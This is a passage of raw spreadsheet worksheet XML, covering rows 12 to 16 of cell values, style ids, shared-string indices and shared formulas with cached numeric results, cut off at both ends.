      <c r="BV12" s="83"/>
      <c r="BW12" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX12" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY12" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ12" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA12" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB12" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC12" s="85"/>
      <c r="CD12" s="85"/>
      <c r="CE12" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF12" s="85"/>
      <c r="CG12" s="85"/>
      <c r="CH12" s="85"/>
      <c r="CI12" s="85"/>
      <c r="CJ12" s="86"/>
      <c r="CK12" s="86"/>
      <c r="CL12" s="86"/>
      <c r="CM12" s="86">
        <v>0.0</v>
      </c>
      <c r="CN12" s="86"/>
      <c r="CO12" s="86"/>
      <c r="CP12" s="86"/>
      <c r="CQ12" s="86"/>
      <c r="CR12" s="86"/>
      <c r="CS12" s="86"/>
      <c r="CT12" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU12" s="88" t="s">
        <v>242</v>
      </c>
      <c r="CV12" s="88">
        <v>4.0</v>
      </c>
      <c r="CW12" s="88">
        <v>10.0</v>
      </c>
      <c r="CX12" s="79" t="s">
        <v>248</v>
      </c>
      <c r="CY12" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ12" s="88"/>
      <c r="DA12" s="88"/>
      <c r="DB12" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC12" s="88"/>
      <c r="DD12" s="88"/>
      <c r="DE12" s="88"/>
      <c r="DF12" s="88"/>
      <c r="DG12" s="89"/>
      <c r="DH12" s="89"/>
      <c r="DI12" s="89"/>
      <c r="DJ12" s="89">
        <v>0.0</v>
      </c>
      <c r="DK12" s="89"/>
      <c r="DL12" s="89"/>
      <c r="DM12" s="89"/>
      <c r="DN12" s="89"/>
      <c r="DO12" s="89"/>
      <c r="DP12" s="89"/>
      <c r="DQ12" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR12" s="91"/>
      <c r="DS12" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT12" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU12" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV12" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW12" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX12" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY12" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ12" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA12" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB12" s="74">
        <v>4.0</v>
      </c>
      <c r="EC12" s="74">
        <v>0.0</v>
      </c>
      <c r="ED12" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE12" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="13" ht="222.75" customHeight="1">
      <c r="B13" s="71" t="s">
        <v>204</v>
      </c>
      <c r="C13" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D13" s="97" t="s">
        <v>205</v>
      </c>
      <c r="E13" s="72" t="s">
        <v>232</v>
      </c>
      <c r="F13" s="72" t="s">
        <v>249</v>
      </c>
      <c r="G13" s="72" t="s">
        <v>250</v>
      </c>
      <c r="H13" s="107" t="s">
        <v>249</v>
      </c>
      <c r="I13" s="73" t="s">
        <v>251</v>
      </c>
      <c r="J13" s="73" t="s">
        <v>252</v>
      </c>
      <c r="K13" s="73" t="s">
        <v>253</v>
      </c>
      <c r="L13" s="74">
        <v>81040.0</v>
      </c>
      <c r="M13" s="74">
        <v>1.0</v>
      </c>
      <c r="N13" s="74">
        <v>1.0</v>
      </c>
      <c r="O13" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P13" s="74">
        <v>1.0</v>
      </c>
      <c r="Q13" s="74">
        <v>0.0</v>
      </c>
      <c r="R13" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S13" s="76" t="s">
        <v>254</v>
      </c>
      <c r="T13" s="98" t="s">
        <v>255</v>
      </c>
      <c r="U13" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V13" s="76" t="s">
        <v>256</v>
      </c>
      <c r="W13" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X13" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y13" s="75" t="s">
        <v>241</v>
      </c>
      <c r="Z13" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA13" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB13" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC13" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD13" s="78" t="s">
        <v>257</v>
      </c>
      <c r="AE13" s="78">
        <v>12.0</v>
      </c>
      <c r="AF13" s="78">
        <v>4718.0</v>
      </c>
      <c r="AG13" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH13" s="78" t="s">
        <v>257</v>
      </c>
      <c r="AI13" s="78"/>
      <c r="AJ13" s="78"/>
      <c r="AK13" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL13" s="78"/>
      <c r="AM13" s="78"/>
      <c r="AN13" s="78"/>
      <c r="AO13" s="78"/>
      <c r="AP13" s="80"/>
      <c r="AQ13" s="80"/>
      <c r="AR13" s="80"/>
      <c r="AS13" s="80">
        <v>0.0</v>
      </c>
      <c r="AT13" s="80"/>
      <c r="AU13" s="80"/>
      <c r="AV13" s="80"/>
      <c r="AW13" s="80"/>
      <c r="AX13" s="80"/>
      <c r="AY13" s="80"/>
      <c r="AZ13" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA13" s="82" t="s">
        <v>258</v>
      </c>
      <c r="BB13" s="82">
        <v>25.0</v>
      </c>
      <c r="BC13" s="82">
        <v>4986.0</v>
      </c>
      <c r="BD13" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE13" s="82" t="s">
        <v>258</v>
      </c>
      <c r="BF13" s="82"/>
      <c r="BG13" s="82"/>
      <c r="BH13" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI13" s="82"/>
      <c r="BJ13" s="82"/>
      <c r="BK13" s="82"/>
      <c r="BL13" s="82"/>
      <c r="BM13" s="83"/>
      <c r="BN13" s="83"/>
      <c r="BO13" s="83"/>
      <c r="BP13" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ13" s="83"/>
      <c r="BR13" s="83"/>
      <c r="BS13" s="83"/>
      <c r="BT13" s="83"/>
      <c r="BU13" s="83"/>
      <c r="BV13" s="83"/>
      <c r="BW13" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX13" s="85" t="s">
        <v>259</v>
      </c>
      <c r="BY13" s="85">
        <v>35.0</v>
      </c>
      <c r="BZ13" s="85">
        <v>10020.0</v>
      </c>
      <c r="CA13" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB13" s="85" t="s">
        <v>259</v>
      </c>
      <c r="CC13" s="85"/>
      <c r="CD13" s="85"/>
      <c r="CE13" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF13" s="85"/>
      <c r="CG13" s="85"/>
      <c r="CH13" s="85"/>
      <c r="CI13" s="85"/>
      <c r="CJ13" s="86"/>
      <c r="CK13" s="86"/>
      <c r="CL13" s="86"/>
      <c r="CM13" s="86">
        <v>0.0</v>
      </c>
      <c r="CN13" s="86"/>
      <c r="CO13" s="86"/>
      <c r="CP13" s="86"/>
      <c r="CQ13" s="86"/>
      <c r="CR13" s="86"/>
      <c r="CS13" s="86"/>
      <c r="CT13" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU13" s="88" t="s">
        <v>260</v>
      </c>
      <c r="CV13" s="88">
        <v>56.0</v>
      </c>
      <c r="CW13" s="88">
        <v>12833.0</v>
      </c>
      <c r="CX13" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY13" s="88" t="s">
        <v>260</v>
      </c>
      <c r="CZ13" s="88"/>
      <c r="DA13" s="88"/>
      <c r="DB13" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC13" s="88"/>
      <c r="DD13" s="88"/>
      <c r="DE13" s="88"/>
      <c r="DF13" s="88"/>
      <c r="DG13" s="89"/>
      <c r="DH13" s="89"/>
      <c r="DI13" s="89"/>
      <c r="DJ13" s="89">
        <v>0.0</v>
      </c>
      <c r="DK13" s="89"/>
      <c r="DL13" s="89"/>
      <c r="DM13" s="89"/>
      <c r="DN13" s="89"/>
      <c r="DO13" s="89"/>
      <c r="DP13" s="89"/>
      <c r="DQ13" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR13" s="91"/>
      <c r="DS13" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT13" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU13" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA13" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB13" s="74">
        <v>142.0</v>
      </c>
      <c r="EC13" s="74">
        <v>0.0</v>
      </c>
      <c r="ED13" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE13" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="14" ht="222.75" customHeight="1">
      <c r="B14" s="71" t="s">
        <v>261</v>
      </c>
      <c r="C14" s="72" t="s">
        <v>262</v>
      </c>
      <c r="D14" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E14" s="72" t="s">
        <v>264</v>
      </c>
      <c r="F14" s="72" t="s">
        <v>265</v>
      </c>
      <c r="G14" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H14" s="107" t="s">
        <v>12</v>
      </c>
      <c r="I14" s="73" t="s">
        <v>266</v>
      </c>
      <c r="J14" s="73" t="s">
        <v>267</v>
      </c>
      <c r="K14" s="73" t="s">
        <v>268</v>
      </c>
      <c r="L14" s="74">
        <v>23.0</v>
      </c>
      <c r="M14" s="74">
        <v>1.0</v>
      </c>
      <c r="N14" s="74">
        <v>1.0</v>
      </c>
      <c r="O14" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P14" s="74">
        <v>1.0</v>
      </c>
      <c r="Q14" s="74">
        <v>0.0</v>
      </c>
      <c r="R14" s="75" t="s">
        <v>269</v>
      </c>
      <c r="S14" s="76" t="s">
        <v>270</v>
      </c>
      <c r="T14" s="76" t="s">
        <v>271</v>
      </c>
      <c r="U14" s="77" t="s">
        <v>272</v>
      </c>
      <c r="V14" s="76" t="s">
        <v>273</v>
      </c>
      <c r="W14" s="76" t="s">
        <v>274</v>
      </c>
      <c r="X14" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y14" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z14" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA14" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB14" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC14" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD14" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE14" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF14" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG14" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH14" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI14" s="78"/>
      <c r="AJ14" s="78"/>
      <c r="AK14" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL14" s="78"/>
      <c r="AM14" s="78"/>
      <c r="AN14" s="78"/>
      <c r="AO14" s="78"/>
      <c r="AP14" s="80"/>
      <c r="AQ14" s="80"/>
      <c r="AR14" s="80"/>
      <c r="AS14" s="80">
        <v>0.0</v>
      </c>
      <c r="AT14" s="80"/>
      <c r="AU14" s="80"/>
      <c r="AV14" s="80"/>
      <c r="AW14" s="80"/>
      <c r="AX14" s="80"/>
      <c r="AY14" s="80"/>
      <c r="AZ14" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA14" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB14" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC14" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD14" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE14" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF14" s="82"/>
      <c r="BG14" s="82"/>
      <c r="BH14" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI14" s="82"/>
      <c r="BJ14" s="82"/>
      <c r="BK14" s="82"/>
      <c r="BL14" s="82"/>
      <c r="BM14" s="83"/>
      <c r="BN14" s="83"/>
      <c r="BO14" s="83"/>
      <c r="BP14" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ14" s="83"/>
      <c r="BR14" s="83"/>
      <c r="BS14" s="83"/>
      <c r="BT14" s="83"/>
      <c r="BU14" s="83"/>
      <c r="BV14" s="83"/>
      <c r="BW14" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX14" s="85" t="s">
        <v>275</v>
      </c>
      <c r="BY14" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ14" s="85">
        <v>6.0</v>
      </c>
      <c r="CA14" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB14" s="85" t="s">
        <v>276</v>
      </c>
      <c r="CC14" s="85"/>
      <c r="CD14" s="85"/>
      <c r="CE14" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF14" s="85"/>
      <c r="CG14" s="85"/>
      <c r="CH14" s="85"/>
      <c r="CI14" s="85"/>
      <c r="CJ14" s="86"/>
      <c r="CK14" s="86"/>
      <c r="CL14" s="86"/>
      <c r="CM14" s="86">
        <v>1.0</v>
      </c>
      <c r="CN14" s="86"/>
      <c r="CO14" s="86"/>
      <c r="CP14" s="86"/>
      <c r="CQ14" s="86"/>
      <c r="CR14" s="86"/>
      <c r="CS14" s="86"/>
      <c r="CT14" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU14" s="88" t="s">
        <v>277</v>
      </c>
      <c r="CV14" s="88">
        <v>7.0</v>
      </c>
      <c r="CW14" s="88">
        <v>53.0</v>
      </c>
      <c r="CX14" s="79" t="s">
        <v>278</v>
      </c>
      <c r="CY14" s="88" t="s">
        <v>279</v>
      </c>
      <c r="CZ14" s="88"/>
      <c r="DA14" s="88"/>
      <c r="DB14" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC14" s="88"/>
      <c r="DD14" s="88"/>
      <c r="DE14" s="88"/>
      <c r="DF14" s="88"/>
      <c r="DG14" s="89"/>
      <c r="DH14" s="89"/>
      <c r="DI14" s="89"/>
      <c r="DJ14" s="89">
        <v>1.0</v>
      </c>
      <c r="DK14" s="89"/>
      <c r="DL14" s="89"/>
      <c r="DM14" s="89"/>
      <c r="DN14" s="89"/>
      <c r="DO14" s="89"/>
      <c r="DP14" s="89"/>
      <c r="DQ14" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR14" s="91"/>
      <c r="DS14" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT14" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU14" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA14" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB14" s="74">
        <v>2.0</v>
      </c>
      <c r="EC14" s="74">
        <v>0.0</v>
      </c>
      <c r="ED14" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE14" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="15" ht="153.75" customHeight="1">
      <c r="B15" s="71" t="s">
        <v>261</v>
      </c>
      <c r="C15" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D15" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E15" s="72" t="s">
        <v>280</v>
      </c>
      <c r="F15" s="72" t="s">
        <v>281</v>
      </c>
      <c r="G15" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H15" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I15" s="73" t="s">
        <v>282</v>
      </c>
      <c r="J15" s="73" t="s">
        <v>283</v>
      </c>
      <c r="K15" s="73" t="s">
        <v>284</v>
      </c>
      <c r="L15" s="74">
        <v>1.0</v>
      </c>
      <c r="M15" s="74">
        <v>1.0</v>
      </c>
      <c r="N15" s="74">
        <v>1.0</v>
      </c>
      <c r="O15" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P15" s="74">
        <v>1.0</v>
      </c>
      <c r="Q15" s="74">
        <v>0.0</v>
      </c>
      <c r="R15" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S15" s="76" t="s">
        <v>285</v>
      </c>
      <c r="T15" s="76" t="s">
        <v>286</v>
      </c>
      <c r="U15" s="77" t="s">
        <v>287</v>
      </c>
      <c r="V15" s="76" t="s">
        <v>288</v>
      </c>
      <c r="W15" s="76" t="s">
        <v>289</v>
      </c>
      <c r="X15" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y15" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z15" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA15" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB15" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC15" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD15" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE15" s="78">
        <v>0.0</v>
      </c>
      <c r="AF15" s="78">
        <v>0.0</v>
      </c>
      <c r="AG15" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH15" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI15" s="78"/>
      <c r="AJ15" s="78"/>
      <c r="AK15" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL15" s="78"/>
      <c r="AM15" s="78"/>
      <c r="AN15" s="78"/>
      <c r="AO15" s="78"/>
      <c r="AP15" s="80"/>
      <c r="AQ15" s="80"/>
      <c r="AR15" s="80"/>
      <c r="AS15" s="80">
        <v>0.0</v>
      </c>
      <c r="AT15" s="80"/>
      <c r="AU15" s="80"/>
      <c r="AV15" s="80"/>
      <c r="AW15" s="80"/>
      <c r="AX15" s="80"/>
      <c r="AY15" s="80"/>
      <c r="AZ15" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA15" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB15" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC15" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD15" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE15" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF15" s="82"/>
      <c r="BG15" s="82"/>
      <c r="BH15" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI15" s="82"/>
      <c r="BJ15" s="82"/>
      <c r="BK15" s="82"/>
      <c r="BL15" s="82"/>
      <c r="BM15" s="83"/>
      <c r="BN15" s="83"/>
      <c r="BO15" s="83"/>
      <c r="BP15" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ15" s="83"/>
      <c r="BR15" s="83"/>
      <c r="BS15" s="83"/>
      <c r="BT15" s="83"/>
      <c r="BU15" s="83"/>
      <c r="BV15" s="83"/>
      <c r="BW15" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX15" s="85">
        <v>50447.0</v>
      </c>
      <c r="BY15" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ15" s="85">
        <v>3.0</v>
      </c>
      <c r="CA15" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB15" s="85">
        <v>50447.0</v>
      </c>
      <c r="CC15" s="85"/>
      <c r="CD15" s="85"/>
      <c r="CE15" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF15" s="85"/>
      <c r="CG15" s="85"/>
      <c r="CH15" s="85"/>
      <c r="CI15" s="85"/>
      <c r="CJ15" s="86"/>
      <c r="CK15" s="86"/>
      <c r="CL15" s="86"/>
      <c r="CM15" s="86">
        <v>0.0</v>
      </c>
      <c r="CN15" s="86"/>
      <c r="CO15" s="86"/>
      <c r="CP15" s="86"/>
      <c r="CQ15" s="86"/>
      <c r="CR15" s="86"/>
      <c r="CS15" s="86"/>
      <c r="CT15" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU15" s="88" t="s">
        <v>290</v>
      </c>
      <c r="CV15" s="88">
        <v>3.0</v>
      </c>
      <c r="CW15" s="88">
        <v>7.0</v>
      </c>
      <c r="CX15" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY15" s="88">
        <v>50447.0</v>
      </c>
      <c r="CZ15" s="88"/>
      <c r="DA15" s="88"/>
      <c r="DB15" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC15" s="88"/>
      <c r="DD15" s="88"/>
      <c r="DE15" s="88"/>
      <c r="DF15" s="88"/>
      <c r="DG15" s="89"/>
      <c r="DH15" s="89"/>
      <c r="DI15" s="89"/>
      <c r="DJ15" s="89">
        <v>0.0</v>
      </c>
      <c r="DK15" s="89"/>
      <c r="DL15" s="89"/>
      <c r="DM15" s="89"/>
      <c r="DN15" s="89"/>
      <c r="DO15" s="89"/>
      <c r="DP15" s="89"/>
      <c r="DQ15" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR15" s="91"/>
      <c r="DS15" s="92">
        <v>15621.0</v>
      </c>
      <c r="DT15" s="93">
        <v>1.0</v>
      </c>
      <c r="DU15" s="93">
        <v>1.0</v>
      </c>
      <c r="DV15" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW15" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX15" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY15" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ15" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA15" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB15" s="74">
        <v>1.0</v>
      </c>
      <c r="EC15" s="74">
        <v>1.0</v>
      </c>
      <c r="ED15" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE15" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="16" ht="153.75" customHeight="1">
      <c r="B16" s="71" t="s">
        <v>261</v>
      </c>
      <c r="C16" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D16" s="72" t="s">
        <v>263</v>
      </c>
      <c r="E16" s="72" t="s">
        <v>280</v>
      </c>
      <c r="F16" s="72" t="s">
        <v>281</v>
      </c>
      <c r="G16" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H16" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I16" s="73" t="s">
        <v>282</v>
      </c>
      <c r="J16" s="73" t="s">
        <v>283</v>
      </c>
      <c r="K16" s="73" t="s">
        <v>291</v>
      </c>
      <c r="L16" s="74">
        <v>77.0</v>
      </c>
      <c r="M16" s="74">
        <v>76.0</v>
      </c>
      <c r="N16" s="74">
        <v>76.0</v>
      </c>
      <c r="O16" s="74">
        <f t="shared" si="1"/>
        <v>150</v>
      </c>
      <c r="P16" s="74">
        <v>150.0</v>
      </c>
      <c r="Q16" s="74">
        <v>0.0</v>
      </c>
      <c r="R16" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S16" s="76" t="s">
        <v>285</v>
      </c>
      <c r="T16" s="76" t="s">
        <v>286</v>
      </c>
      <c r="U16" s="77" t="s">
        <v>292</v>
      </c>
      <c r="V16" s="76" t="s">
        <v>293</v>
      </c>
      <c r="W16" s="76" t="s">
        <v>294</v>
      </c>
      <c r="X16" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y16" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z16" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA16" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB16" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC16" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD16" s="78" t="s">
        <v>295</v>
      </c>
      <c r="AE16" s="78">
        <v>3.0</v>
      </c>
      <c r="AF16" s="78">
        <v>5.0</v>
      </c>
      <c r="AG16" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH16" s="78" t="s">
        <v>296</v>
      </c>
      <c r="AI16" s="78"/>
      <c r="AJ16" s="78"/>
      <c r="AK16" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL16" s="78"/>
      <c r="AM16" s="78"/>
      <c r="AN16" s="78"/>
      <c r="AO16" s="78"/>
      <c r="AP16" s="80"/>
      <c r="AQ16" s="80"/>
      <c r="AR16" s="80"/>
      <c r="AS16" s="80">
        <v>76.0</v>
      </c>
      <c r="AT16" s="80"/>
      <c r="AU16" s="80"/>
      <c r="AV16" s="80"/>
      <c r="AW16" s="80"/>
      <c r="AX16" s="80"/>
      <c r="AY16" s="80"/>
      <c r="AZ16" s="81">
        <f t="shared" si="3"/>
        <v>0.5066666667</v>
      </c>
      <c r="BA16" s="82" t="s">
        <v>297</v>
      </c>
      <c r="BB16" s="82">
        <v>9.0</v>
      </c>
      <c r="BC16" s="82">
        <v>82.0</v>
      </c>
      <c r="BD16" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE16" s="82" t="s">
        <v>298</v>
      </c>
      <c r="BF16" s="82"/>
      <c r="BG16" s="82"/>
      <c r="BH16" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI16" s="82"/>
      <c r="BJ16" s="82"/>
      <c r="BK16" s="82"/>
      <c r="BL16" s="82"/>
      <c r="BM16" s="83"/>
      <c r="BN16" s="83"/>
      <c r="BO16" s="83"/>
      <c r="BP16" s="83">
        <v>76.0</v>
      </c>
      <c r="BQ16" s="83"/>
      <c r="BR16" s="83"/>
      <c r="BS16" s="83"/>
      <c r="BT16" s="83"/>
      <c r="BU16" s="83"/>
      <c r="BV16" s="83"/>
      <c r="BW16" s="84">
        <f t="shared" si="5"/>
        <v>0.5066666667</v>
      </c>
      <c r="BX16" s="85" t="s">
        <v>299</v>
      </c>
      <c r="BY16" s="85">
        <v>13.0</v>
      </c>
      <c r="BZ16" s="85">
        <v>458.0</v>
      </c>
      <c r="CA16" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB16" s="85" t="s">
        <v>300</v>
      </c>
      <c r="CC16" s="85"/>
      <c r="CD16" s="85"/>
      <c r="CE16" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF16" s="85"/>
      <c r="CG16" s="85"/>
      <c r="CH16" s="85"/>
      <c r="CI16" s="85"/>
      <c r="CJ16" s="86"/>
      <c r="CK16" s="86"/>
      <c r="CL16" s="86"/>
      <c r="CM16" s="86">
        <v>76.0</v>
      </c>
      <c r="CN16" s="86"/>
      <c r="CO16" s="86"/>
      <c r="CP16" s="86"/>
      <c r="CQ16" s="86"/>
      <c r="CR16" s="86"/>
      <c r="CS16" s="86"/>
      <c r="CT16" s="87">
        <f t="shared" si="7"/>
        <v>0.5066666667</v>
      </c>
      <c r="CU16" s="88" t="s">
        <v>301</v>
      </c>
      <c r="CV16" s="88">
        <v>17.0</v>
      </c>
      <c r="CW16" s="88">
        <v>536.0</v>
      </c>
      <c r="CX16" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY16" s="88" t="s">
        <v>302</v>
      </c>
      <c r="CZ16" s="88"/>
      <c r="DA16" s="88"/>
      <c r="DB16" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC16" s="88"/>
      <c r="DD16" s="88"/>
      <c r="DE16" s="88"/>
      <c r="DF16" s="88"/>
      <c r="DG16" s="89"/>
      <c r="DH16" s="89"/>
      <c r="DI16" s="89"/>
      <c r="DJ16" s="89">
        <v>76.0</v>
      </c>
      <c r="DK16" s="89"/>
      <c r="DL16" s="89"/>
      <c r="DM16" s="89"/>
      <c r="DN16" s="89"/>
      <c r="DO16" s="89"/>
      <c r="DP16" s="89"/>
      <c r="DQ16" s="90">
        <f t="shared" si="9"/>
        <v>0.5066666667</v>
      </c>
      <c r="DR16" s="91" t="s">
        <v>303</v>
      </c>
      <c r="DS16" s="92" t="s">
        <v>304</v>
      </c>
      <c r="DT16" s="93">
        <v>2.0</v>
      </c>
      <c r="DU16" s="93">
        <v>150.0</v>
      </c>
      <c r="DV16" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW16" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX16" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY16" s="94" t="s">
        <v>12</v>
      </c>
